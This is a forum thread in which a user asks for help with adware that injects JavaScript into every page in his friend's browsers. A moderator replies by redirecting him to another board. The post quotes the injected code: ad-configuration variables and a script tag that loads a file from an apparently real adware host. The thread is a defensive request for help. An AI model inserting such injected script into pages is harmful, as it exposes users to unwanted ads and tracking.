Author Topic: Adware (local js injection)  (Read 4150 times)

0 Members and 1 Guest are viewing this topic.

Offline frank_1005

  • Newbie
  • *
  • Posts: 2
Adware (local js injection)
« on: August 22, 2015, 06:05:53 PM »
Hello.
I'm not sure if this is the right forum to post my message on as I'm new on this forum.

Today one of my friend asked me to clean his computer because he had tons of ads on every single web site he visited.
Of course he tried to do a deep scan with Avast (free edition) but it couldn't find anything.

I've managed to isolate the cause of the issue. Something somewhere is injecting some javascript stuff at the end of every web page.
Here is exactly what is being injected. I've replace the values clientid, channelid and clientcreatetime (we never know ...).

Quote
var e_rfndmeclientid = 11111111;
var e_rfndmechannelid = '111111';
var e_rfndmecustomwidgettitle='FlashBeat';
var e_rfndmecustomatalink = '';
var e_rfndmesubid = 'CN1';
var e_rfndmegeo = 'gb';
var e_rfndmeclientcreatetime       = 1111111111;
var e_rfndmeextid = '';
var e_displaysecondsinterval        = 300;
var e_rfndme_sys_show_intext        = true;
var e_rfndme_sys_intjs_display_seconds_interval = 300;
var e_sys_display_show_downloads   = true;
var e_rfndme_sys_show_ws           = true;
var e_rfndme_sys_show_easy2book    = true;
var e_rfndme_sys_show_irobinhood   = true;
var e_rfndme_sys_show_sfish        = true;
var e_rfndme_sys_show_sgt          = true;
var e_rfndme_sys_show_noproblem    = true;
var e_rfndme_sys_show_engageya     = true;
var e_rfndme_sys_show_display      = true;
var e_rfndme_sys_add_profiledata   = true;
var e_rfndme_sys_show_offerdynamic = true;
var e_rfndme_sys_show_intr_js      = true;
var e_rfndme_sys_intjs_allow_video = true;
var e_rfndme_cc_shopping           = true;
var e_rfndme_sys_show_intr_js_small_ads=true;
var e_rfndme_sys_show_ws_after     = 20500;
var e_rfndme_sys_intjs_allow_ws    = false;
var e_rfndme_sys_show_covus        = false;
var e_rfndme_sys_show_pre_roll_video = false;
var e_rfndme_sys_show_imonnomy = true;
var e_rfndme_sys_show_728_banner = true;
var e_rfndme_sys_show_serp = false;
var e_sys_display_show_search_engine_pops=true;
e_sys_display_show_search_engine_pops=true;e_rfndme_sys_show_serp=true; 


</script><script src="//s.orange81safe.com/gc0.js"></script>

This content is present on Internet Explorer, Firefox and Chrome.
I've done a couple of checks and it's not comming from the Kernel, apparently. All the modules/extensions on all the browsers have been disabled and uninstalled.
There's no proxy configured locally.
HTTPS connections are affected too. I've checked the certificates and everything looks alright.
So it means that the injections is happening internally in the process.

I'm just confused and intrigued about how it's being injected. Maybe a shared library or something ? Because it affects all the browsers installed on the machine.

So I've just created a new firewall rule so it can't download the javascript file anymore. But obviously this is not a long term solution.

Any help would be greatly appreciated.
Thank you.

Offline frank_1005

  • Newbie
  • *
  • Posts: 2
Re: Adware (local js injection)
« Reply #1 on: August 22, 2015, 06:10:46 PM »
I've just realised there's a dedicated section for this kind of issue.
Sorry for that. If a moderator can move this post to the right section that would be great.

Thank you  ;D

Offline Asyn

  • Avast √úberevangelist
  • Certainly Bot
  • *****
  • Posts: 72963
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Adware (local js injection)
« Reply #2 on: August 22, 2015, 06:46:38 PM »
Start a new topic in V&W and post your logs there: https://forum.avast.com/index.php?action=post;board=4.0
Win 8.1 [x64] - Avast PremSec 21.11.6787.IBC [UI.683] - EEK - Firefox ESR 91.4 [NS/uBO/PB] - TB 91.4
Avast-Tools: Secure Browser 96.0 - Cleanup 21.4 - SecureLine 5.14 - Driver Updater 21.4 - CCleaner 5.87
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0